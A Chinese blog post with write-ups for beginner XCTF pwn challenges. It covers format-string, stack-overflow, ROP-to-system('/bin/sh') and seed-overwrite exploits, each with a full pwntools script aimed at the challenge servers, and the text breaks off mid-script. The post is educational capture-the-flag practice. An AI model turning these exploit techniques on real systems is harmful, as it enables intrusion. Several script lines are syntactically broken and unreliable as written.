<!DOCTYPE html>

<html lang="zh-Hans">

<head><meta name="generator" content="Hexo 3.8.0">
  
  <title>攻防世界自闭之路&lt;新手练习区&gt; - chessman</title>
  <meta charset="UTF-8">
  <meta name="description" content="辣鸡刘某 在线掉头（发）">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5">
  
  

  <link rel="shortcut icon" href="/favicon.ico" type="image/png">
  <meta name="description" content="前言基础做完了，我就换个坑，如果什么时候我能写完xctf的所有题，我就nb（应该）">
<meta name="keywords" content="ctf">
<meta property="og:type" content="article">
<meta property="og:title" content="攻防世界自闭之路&lt;新手练习区&gt;">
<meta property="og:url" content="http://chessman.me/2019/08/19/攻防世界/攻防世界自闭之路/index.html">
<meta property="og:site_name" content="chessman">
<meta property="og:description" content="前言基础做完了，我就换个坑，如果什么时候我能写完xctf的所有题，我就nb（应该）">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://s2.ax1x.com/2019/08/21/mNUMX4.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/08/21/mNayqJ.jpg">
<meta property="og:image" content="https://s2.ax1x.com/2019/08/21/mNsam8.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/08/21/mNs4k4.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/08/21/mU7zYn.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/08/21/mU2nAK.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/08/21/mUH8TH.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/08/21/mUIxF1.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/08/21/mUor79.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/08/21/mUHykj.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/08/21/mUb5xP.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/08/21/mUbL5j.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/08/21/mUbv2q.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/08/21/mUqfwF.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/08/21/mUOVu6.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/08/21/mUOLIe.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/08/21/mUOvRA.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/08/21/mUX9qf.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/08/21/mUOB2n.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/08/23/mDIyef.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/08/23/mrpPWq.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/08/23/mrptTH.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/08/23/mr9wE4.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/08/19/m3OUQe.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/08/19/m3XrnJ.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/08/19/m3XHAI.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/08/24/mylGDS.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/08/24/myNJtU.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/08/24/myNb9g.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/08/24/myUZHx.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/08/24/myBju4.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/08/24/myUQ8e.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/08/24/myww8O.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/08/24/mygpUH.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/08/23/mDrF7q.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/08/23/mDsEqA.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/08/23/mDyYOH.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/08/23/mD6ngS.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/08/23/mD6ggO.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/08/23/mDgnmQ.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/09/01/nS7rMd.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/09/01/npSluT.png">
<meta property="og:updated_time" content="2019-09-01T06:00:00.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="攻防世界自闭之路&lt;新手练习区&gt;">
<meta name="twitter:description" content="前言基础做完了，我就换个坑，如果什么时候我能写完xctf的所有题，我就nb（应该）">
<meta name="twitter:image" content="https://s2.ax1x.com/2019/08/21/mNUMX4.png">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/combine/gh/nexmoe/nexmoe.github.io@latest/css/style.css,npm/highlight.js@9.15.8/styles/atom-one-dark.css,gh/nexmoe/nexmoe.github.io@latest/lib/mdui_043tiny/css/mdui.css,gh/nexmoe/nexmoe.github.io@latest/lib/iconfont/iconfont.css" crossorigin>
  
  <!--<link rel="stylesheet" href="/css/style.css?v=1586857528216">-->

   
    <style>
      .nexmoe-avatar img:hover {
        -webkit-transform: rotateZ(360deg);
        -moz-transform: rotateZ(360deg);
        transform: rotateZ(360deg);
      }	
    </style>
  
</head>

<body class="mdui-drawer-body-left">
  
  <div id="nexmoe-background">
    <div class="nexmoe-bg" style="background-image: url(https://ww1.yunjiexi.club/2020/04/13/88b19.jpg)"></div>
    <div class="mdui-appbar mdui-shadow-0">
      <div class="mdui-toolbar">
        <a mdui-drawer="{target: '#drawer', swipe: true}" title="menu" class="mdui-btn mdui-btn-icon mdui-ripple"><i class="mdui-icon nexmoefont icon-menu"></i></a>
        <div class="mdui-toolbar-spacer"></div>
        <!--<a href="javascript:;" class="mdui-btn mdui-btn-icon"><i class="mdui-icon material-icons">search</i></a>-->
        <a href="/" title="chessman" class="mdui-btn mdui-btn-icon"><img src="https://ww1.yunjiexi.club/2020/04/13/88mzb.jpg" alt="chessman"></a>
       </div>
    </div>
  </div>
  <div id="nexmoe-header">
      <div class="nexmoe-drawer mdui-drawer" id="drawer">
    <div class="nexmoe-avatar mdui-ripple">
        <a href="/" title="chessman">
            <img src="https://ww1.yunjiexi.club/2020/04/13/88mzb.jpg" alt="chessman">
        </a>
    </div>
    <div class="nexmoe-count">
        <div><span>Articles</span>8</div>
        <div><span>Tags</span>4</div>
        <div><span>Categories</span>0</div>
    </div>
    <div class="nexmoe-list mdui-list" mdui-collapse="{accordion: true}">
        
        <a class="nexmoe-list-item mdui-list-item mdui-ripple" href="/" title="回到首页">
            <i class="mdui-list-item-icon nexmoefont icon-home"></i>
            <div class="mdui-list-item-content">
                回到首页
            </div>
        </a>
        
        <a class="nexmoe-list-item mdui-list-item mdui-ripple" href="/archives" title="文章归档">
            <i class="mdui-list-item-icon nexmoefont icon-container"></i>
            <div class="mdui-list-item-content">
                文章归档
            </div>
        </a>
        
        <a class="nexmoe-list-item mdui-list-item mdui-ripple" href="/about.md" title="关于博客">
            <i class="mdui-list-item-icon nexmoefont icon-info-circle"></i>
            <div class="mdui-list-item-content">
                关于博客
            </div>
        </a>
        
        <a class="nexmoe-list-item mdui-list-item mdui-ripple" href="/PY.md" title="我的朋友">
            <i class="mdui-list-item-icon nexmoefont icon-unorderedlist"></i>
            <div class="mdui-list-item-content">
                我的朋友
            </div>
        </a>
        
    </div>
    <aside id="nexmoe-sidebar">
  
  <div class="nexmoe-widget-wrap">
    <div class="nexmoe-widget nexmoe-search">
        <form id="search_form" action_e="https://cn.bing.com/search?q=site:nexmoe.com" onsubmit="return search();">
            <label><input id="search_value" name="q" type="search" placeholder="Search"></label>
        </form>
    </div>
</div>
  
  <div class="nexmoe-widget-wrap">
    <h3 class="nexmoe-widget-title">Social</h3>
    <div class="nexmoe-widget nexmoe-social">
        <a class="mdui-ripple" href="https://github.com/cheemanl" target="_blank" mdui-tooltip="{content: 'GitHub'}" style="color: rgb(25, 23, 23);background-color: rgba(25, 23, 23, .15);">
            <i class="nexmoefont icon-github"></i>
        </a>
    </div>
</div>
  
  

  
  
  <div class="nexmoe-widget-wrap">
    <h3 class="nexmoe-widget-title">Tagcloud</h3>
    <div id="randomtagcloud" class="nexmoe-widget tagcloud nexmoe-rainbow">
      <a href="/tags/ctf/" style="font-size: 16.67px;">ctf</a> <a href="/tags/how2heapc/" style="font-size: 10px;">how2heapc</a> <a href="/tags/wiki/" style="font-size: 13.33px;">wiki</a> <a href="/tags/菜鸡的菜鸡笔记/" style="font-size: 20px;">菜鸡的菜鸡笔记</a>
    </div>
    
  </div>

  
  
  <div class="nexmoe-widget-wrap">
    <h3 class="nexmoe-widget-title">Archive</h3>
    <div class="nexmoe-widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/10/">October 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/09/">September 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/08/">August 2019</a></li></ul>
    </div>
  </div>


  
</aside>
    <div class="nexmoe-copyright">
        &copy; 2020 chessman
        Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
        & <a href="https://nexmoe.com/hexo-theme-nexmoe.html" target="_blank">Nexmoe</a>
    </div>
</div><!-- .nexmoe-drawer -->
  </div>
  <div id="nexmoe-content">
    <div class="nexmoe-primary">
        <div class="nexmoe-post">
  
      <div class="nexmoe-post-cover" style="padding-bottom: 69.44444444444444%;"> 
          <img data-src="https://ww1.yunjiexi.club/2020/04/13/88b19.jpg" data-sizes="auto" alt="攻防世界自闭之路&lt;新手练习区&gt;" class="lazyload">
          <h1>攻防世界自闭之路&lt;新手练习区&gt;</h1>
      </div>
  
  
  <div class="nexmoe-post-meta nexmoe-rainbow" style="margin:10px 0!important;">
    <a><i class="nexmoefont icon-calendar-fill"></i>2019年08月19日</a>
    <a><i class="nexmoefont icon-areachart"></i>3,203 字</a>
    <a><i class="nexmoefont icon-time-circle-fill"></i>大概 13 分钟</a>
</div>

  <div class="nexmoe-post-right">
    
      <div class="nexmoe-fixed">
        <div class="nexmoe-valign">
            <div class="nexmoe-toc">
                <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#前言"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#cgfsd"><span class="toc-number">2.</span> <span class="toc-text">cgfsd</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#查看开启了什么保护"><span class="toc-number">2.1.</span> <span class="toc-text">查看开启了什么保护</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ida查看伪代码"><span class="toc-number">2.2.</span> <span class="toc-text">ida查看伪代码</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#完整的exp"><span class="toc-number">2.3.</span> <span class="toc-text">完整的exp</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#when-did-you-born"><span class="toc-number">3.</span> <span class="toc-text">when_did_you_born</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#查看开启的保护"><span class="toc-number">3.1.</span> <span class="toc-text">查看开启的保护</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ida查看"><span class="toc-number">3.2.</span> <span class="toc-text">ida查看</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#完整exp"><span class="toc-number">3.3.</span> <span class="toc-text">完整exp</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#hello-pwn"><span class="toc-number">4.</span> <span class="toc-text">hello_pwn</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#查看开启的保护-1"><span class="toc-number">4.1.</span> <span class="toc-text">查看开启的保护</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ida查看伪代码-1"><span class="toc-number">4.2.</span> <span class="toc-text">ida查看伪代码</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#完整exp-1"><span class="toc-number">4.3.</span> <span class="toc-text">完整exp</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#level0"><span class="toc-number">5.</span> <span class="toc-text">level0</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#查看开启的保护-2"><span class="toc-number">5.1.</span> <span class="toc-text">查看开启的保护</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ida查看伪代码-2"><span class="toc-number">5.2.</span> <span class="toc-text">ida查看伪代码</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#完整的exp-1"><span class="toc-number">5.3.</span> <span class="toc-text">完整的exp</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#level2"><span class="toc-number">6.</span> <span class="toc-text">level2</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#查看开启的保护-3"><span class="toc-number">6.1.</span> <span class="toc-text">查看开启的保护</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ida查看伪代码-3"><span class="toc-number">6.2.</span> <span class="toc-text">ida查看伪代码</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#完整exp-2"><span class="toc-number">6.3.</span> <span class="toc-text">完整exp</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#guess-num"><span class="toc-number">7.</span> <span class="toc-text">guess num</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#查看保护"><span class="toc-number">7.1.</span> <span class="toc-text">查看保护</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#打开ida查看伪代码"><span class="toc-number">7.2.</span> <span class="toc-text">打开ida查看伪代码</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#完整exp-3"><span class="toc-number">7.3.</span> <span class="toc-text">完整exp</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#参考文档"><span class="toc-number">7.4.</span> <span class="toc-text">参考文档</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#cgpwn2"><span class="toc-number">8.</span> <span class="toc-text">cgpwn2</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#查看开启的保护-4"><span class="toc-number">8.1.</span> <span class="toc-text">查看开启的保护</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#查看程序伪代码"><span class="toc-number">8.2.</span> <span class="toc-text">查看程序伪代码</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#完整的exp-2"><span class="toc-number">8.3.</span> <span class="toc-text">完整的exp</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#string"><span class="toc-number">9.</span> <span class="toc-text">string</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#查看保护机制"><span class="toc-number">9.1.</span> <span class="toc-text">查看保护机制</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ida查看伪代码-4"><span class="toc-number">9.2.</span> <span class="toc-text">ida查看伪代码</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#完整exp为"><span class="toc-number">9.3.</span> <span class="toc-text">完整exp为</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#int-overflow"><span class="toc-number">10.</span> <span class="toc-text">int_overflow</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#查看保护-1"><span class="toc-number">10.1.</span> <span class="toc-text">查看保护</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#打开ida查看伪代码-1"><span class="toc-number">10.2.</span> <span class="toc-text">打开ida查看伪代码</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#完整的exp为"><span class="toc-number">10.3.</span> <span class="toc-text">完整的exp为</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#level3"><span class="toc-number">11.</span> <span class="toc-text">level3</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#查看保护-2"><span class="toc-number">11.1.</span> <span class="toc-text">查看保护</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ida查看代码"><span class="toc-number">11.2.</span> <span class="toc-text">ida查看代码</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#完整exp-4"><span class="toc-number">11.3.</span> <span class="toc-text">完整exp</span></a></li></ol></li></ol>
            </div>
        </div>
      </div>
    
  </div>

  <article>
    <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>基础做完了，我就换个坑，如果什么时候我能写完xctf的所有题，我就nb（应该）</p>
<a id="more"></a>
<h1 id="cgfsd"><a href="#cgfsd" class="headerlink" title="cgfsd"></a>cgfsd</h1><blockquote>
<p>格式化字符串漏洞的简单利用 </p>
</blockquote>
<p>做这道题的时候因为对格式化字符串漏洞不晓得所以放了几天去查了一些资料，但是还是不大晓得= =。所以这个wp就是个看完大佬们博客之后的一个搬运。等我哪天看懂这些个资料了，我再回来好好写写（希望能有这一天）</p>
<h2 id="查看开启了什么保护"><a href="#查看开启了什么保护" class="headerlink" title="查看开启了什么保护"></a>查看开启了什么保护</h2><p><img src="https://s2.ax1x.com/2019/08/21/mNUMX4.png" alt></p>
<p>开了canary和nx保护</p>
<p><img src="https://s2.ax1x.com/2019/08/21/mNayqJ.jpg" alt></p>
<h2 id="ida查看伪代码"><a href="#ida查看伪代码" class="headerlink" title="ida查看伪代码"></a>ida查看伪代码</h2><p>直接看题目就是能看到的意思就是控制<code>pwnme</code>的变量就行了，也就是<code>pwnne</code> = 8就行了。同时打开ida就知道pwnme为全局变量。所以直接拿到pwnme的地址，将pwnme覆盖成8就可以cat flag了。</p>
<p><img src="https://s2.ax1x.com/2019/08/21/mNsam8.png" alt>                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                同时pwnme的地址为</p>
<p><img src="https://s2.ax1x.com/2019/08/21/mNs4k4.png" alt></p>
<p>所以<code>payload = p32(pwnme的地址) + 偏移地址</code>偏移地址的计算能通过gdb打开esp直接数出来也能通过直接输入%x打印出来，方法很多。计算出来的偏移值为10</p>
<h2 id="完整的exp"><a href="#完整的exp" class="headerlink" title="完整的exp"></a>完整的exp</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"> </span><br><span class="line">p = remote(<span class="string">'111.198.29.45'</span>, <span class="number">31559</span>)</span><br><span class="line">pwnme = <span class="number">0x0804A068</span></span><br><span class="line"> </span><br><span class="line">payload1 = <span class="string">'aaaa'</span></span><br><span class="line">payload2 = p32(pwnme) + <span class="string">'aaaa%10$n'</span></span><br><span class="line"> </span><br><span class="line">p.sendlineafter(<span class="string">"\n"</span>,payload1)</span><br><span class="line">p.sendlineafter(<span class="string">"\n"</span>,payload2)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h1 id="when-did-you-born"><a href="#when-did-you-born" class="headerlink" title="when_did_you_born"></a>when_did_you_born</h1><blockquote>
<p>简单栈溢出</p>
</blockquote>
<p>覆盖地址</p>
<h2 id="查看开启的保护"><a href="#查看开启的保护" class="headerlink" title="查看开启的保护"></a>查看开启的保护</h2><p><img src="https://s2.ax1x.com/2019/08/21/mU7zYn.png" alt></p>
<h2 id="ida查看"><a href="#ida查看" class="headerlink" title="ida查看"></a>ida查看</h2><p>这个题目比较简单直接打开ida就能看出来题目意图，就是覆盖v5使其变成1926，就okkk了。而且点进v5就能直接查看地址偏移值<code>0x20-0x18</code></p>
<p>就能直接得出<code>payload = 8*&#39;a&#39; + p64(0x0786)</code></p>
<p><img src="https://s2.ax1x.com/2019/08/21/mU2nAK.png" alt></p>
<h2 id="完整exp"><a href="#完整exp" class="headerlink" title="完整exp"></a>完整exp</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p = remote(“”) <span class="comment">#当时没保存端口</span></span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">"What's Your Birth?\n"</span>,str(<span class="number">1998</span>))<span class="comment">#这里只要不等于1926就可以</span></span><br><span class="line">payload = <span class="string">"A"</span>*<span class="number">8</span> + p32(<span class="number">1926</span>)</span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">"What's Your Name?\n"</span>,payload)</span><br><span class="line"><span class="keyword">print</span> p.recv()</span><br></pre></td></tr></table></figure>
<h1 id="hello-pwn"><a href="#hello-pwn" class="headerlink" title="hello_pwn"></a>hello_pwn</h1><blockquote>
<p>简单栈溢出</p>
</blockquote>
<h2 id="查看开启的保护-1"><a href="#查看开启的保护-1" class="headerlink" title="查看开启的保护"></a>查看开启的保护</h2><p><img src="https://s2.ax1x.com/2019/08/21/mUH8TH.png" alt></p>
<h2 id="ida查看伪代码-1"><a href="#ida查看伪代码-1" class="headerlink" title="ida查看伪代码"></a>ida查看伪代码</h2><p>有点像上边这题，但是system函数不在main函数里面。所以直接shift+F12找到<code>cat flag</code>字符串并且定位到函数为<code>sub_400686()</code>。</p>
<p><img src="https://s2.ax1x.com/2019/08/21/mUIxF1.png" alt></p>
<p>然后直接查看main函数，找到read的输入与条件</p>
<p><img src="https://s2.ax1x.com/2019/08/21/mUor79.png" alt></p>
<p>则<code>payload = (0x601068-0x60106C)* &#39;a&#39; + p64(1853186401)</code></p>
<h2 id="完整exp-1"><a href="#完整exp-1" class="headerlink" title="完整exp"></a>完整exp</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p = remote(<span class="string">"111.198.29.45"</span>,<span class="string">"31004"</span>)</span><br><span class="line">payload = <span class="number">4</span> * <span class="string">'a'</span> + p64(<span class="number">1853186401</span>)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h1 id="level0"><a href="#level0" class="headerlink" title="level0"></a>level0</h1><blockquote>
<p>简单栈溢出漏洞 构造ROP链</p>
</blockquote>
<h2 id="查看开启的保护-2"><a href="#查看开启的保护-2" class="headerlink" title="查看开启的保护"></a>查看开启的保护</h2><p><img src="https://s2.ax1x.com/2019/08/21/mUHykj.png" alt></p>
<h2 id="ida查看伪代码-2"><a href="#ida查看伪代码-2" class="headerlink" title="ida查看伪代码"></a>ida查看伪代码</h2><p>main函数和中间的子函数，因为不是条件满足的，所以只能通过构造ROP链使其ret到callsysytem函数中</p>
<p><img src="https://s2.ax1x.com/2019/08/21/mUb5xP.png" alt></p>
<p><img src="https://s2.ax1x.com/2019/08/21/mUbL5j.png" alt></p>
<p>可以看到buf段的栈顶位置为</p>
<p><img src="https://s2.ax1x.com/2019/08/21/mUbv2q.png" alt></p>
<p>则 <code>payload = 填充buf段的内存 + 0x8位覆盖EBP + callsystem的地址</code></p>
<p>callsystem的地址为</p>
<p><img src="https://s2.ax1x.com/2019/08/21/mUqfwF.png" alt></p>
<h2 id="完整的exp-1"><a href="#完整的exp-1" class="headerlink" title="完整的exp"></a>完整的exp</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">a=remote()</span><br><span class="line"></span><br><span class="line">payload=<span class="string">'A'</span>*<span class="number">0x80</span>+<span class="string">'A'</span>*<span class="number">8</span>+p64(<span class="number">0x0000000000400596</span>)</span><br><span class="line">a.recvuntil(<span class="string">"d"</span>)</span><br><span class="line"></span><br><span class="line">a.send(payload)</span><br><span class="line">a.interactive（）</span><br></pre></td></tr></table></figure>
<h1 id="level2"><a href="#level2" class="headerlink" title="level2"></a>level2</h1><blockquote>
<p>简单栈溢出漏洞 构造ROP链</p>
</blockquote>
<h2 id="查看开启的保护-3"><a href="#查看开启的保护-3" class="headerlink" title="查看开启的保护"></a>查看开启的保护</h2><p><img src="https://s2.ax1x.com/2019/08/21/mUOVu6.png" alt></p>
<h2 id="ida查看伪代码-3"><a href="#ida查看伪代码-3" class="headerlink" title="ida查看伪代码"></a>ida查看伪代码</h2><p>查看main函数和vulner函数，意识到需要构造ROP链</p>
<p><img src="https://s2.ax1x.com/2019/08/21/mUOLIe.png" alt></p>
<p><img src="https://s2.ax1x.com/2019/08/21/mUOvRA.png" alt></p>
<p>那么就查看buf段内存</p>
<p><img src="https://s2.ax1x.com/2019/08/21/mUX9qf.png" alt></p>
<p>则payload</p>
<p>查看字符串代码，发现有/bin/sh函数。</p>
<p><img src="https://s2.ax1x.com/2019/08/21/mUOB2n.png" alt></p>
<p>但是/bin/sh和system不是一起的。所以需要构造system(“/bin/sh”)的值。所以得到payload</p>
<p><code>payload = 0x88填充buf + 0x4填充EBP + system()函数地址覆盖EIP + 0x0任意返回地址 + ‘/bin/sh’字符串地址</code></p>
<h2 id="完整exp-2"><a href="#完整exp-2" class="headerlink" title="完整exp"></a>完整exp</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span>  pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line">tp = remote(<span class="string">'111.198.29.45'</span>,<span class="number">47512</span>)</span><br><span class="line"></span><br><span class="line">shell_addr = <span class="number">0x0804A024</span></span><br><span class="line">buf = <span class="number">0x88</span> + <span class="number">0x04</span></span><br><span class="line">sys_addr = <span class="number">0x08048320</span></span><br><span class="line"></span><br><span class="line">payload =  buf *<span class="string">'A'</span> + p32(sys_addr) + p32(<span class="number">0</span>) + p32(shell_addr)</span><br><span class="line"></span><br><span class="line">tp.recvuntil(<span class="string">"Input:"</span>)</span><br><span class="line">tp.send(payload)</span><br><span class="line">tp.interactive()</span><br></pre></td></tr></table></figure>
<h1 id="guess-num"><a href="#guess-num" class="headerlink" title="guess num"></a>guess num</h1><blockquote>
<p>srand,rand与seed的关系，判断逻辑关系，覆盖seed随机种子</p>
</blockquote>
<h2 id="查看保护"><a href="#查看保护" class="headerlink" title="查看保护"></a>查看保护</h2><p> <img src="https://s2.ax1x.com/2019/08/23/mDIyef.png" alt></p>
<p>嗯，都开了。看起来就是我不会做的题目，退学，回家</p>
<h2 id="打开ida查看伪代码"><a href="#打开ida查看伪代码" class="headerlink" title="打开ida查看伪代码"></a>打开ida查看伪代码</h2><p>你就能发现这题的结构非常简单，他只有一个main函数有用，然后你过了他这个循环你就能直接拿到flag，但是这个循环就很有毛病了，猜10个随机从0~5的数，每次程序重新跑一次，它就变一次。就像是个负心的男人，总是这么善变（雾）。正常来说是不可能过的，除非你用十年寿命做交换，换十抽全是ssr（醒醒啊，大哥。这不可能的）</p>
<p>​    <img src="https://s2.ax1x.com/2019/08/23/mrpPWq.png" alt></p>
<p>然后你就会发现一个你之前没有见过的函数，它长这样</p>
<p> <img src="https://s2.ax1x.com/2019/08/23/mrptTH.png" alt></p>
<p>这个随机数函数，是可以被控制的，同时seed随机种子的地址与v8相连（数据段var_30）覆盖seed的值，使得随机数变成可知</p>
<p><img src="https://s2.ax1x.com/2019/08/23/mr9wE4.png" alt></p>
<p>则<code>payload = 填充v8数据段0x20 + 赋给seed的值</code></p>
<p>但是我们需要在exp中加入c语言函数srand与rand。在交互payload之后，用函数确定随机的值。</p>
<p>关于调用函数下边有链接，可以自己看看。然后直接用</p>
<h2 id="完整exp-3"><a href="#完整exp-3" class="headerlink" title="完整exp"></a>完整exp</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> ctypes <span class="keyword">import</span> *</span><br><span class="line">context.log_level = <span class="string">'debug'</span> </span><br><span class="line"></span><br><span class="line">p = remote(<span class="string">"120.77.219.21"</span>,<span class="number">1241</span>)</span><br><span class="line">p.recvuntil(<span class="string">"Your name:"</span>)</span><br><span class="line"></span><br><span class="line">payloadline(payload) = <span class="number">0x20</span> * <span class="string">'A'</span> + p64(<span class="number">1</span>)</span><br><span class="line">p.send(payload)</span><br><span class="line">libc = cdll.LoadLibrary(<span class="string">"/lib/x86_64-linux-gnu/libc.so.6"</span>)</span><br><span class="line">libc.srand(<span class="number">1</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">10</span>):</span><br><span 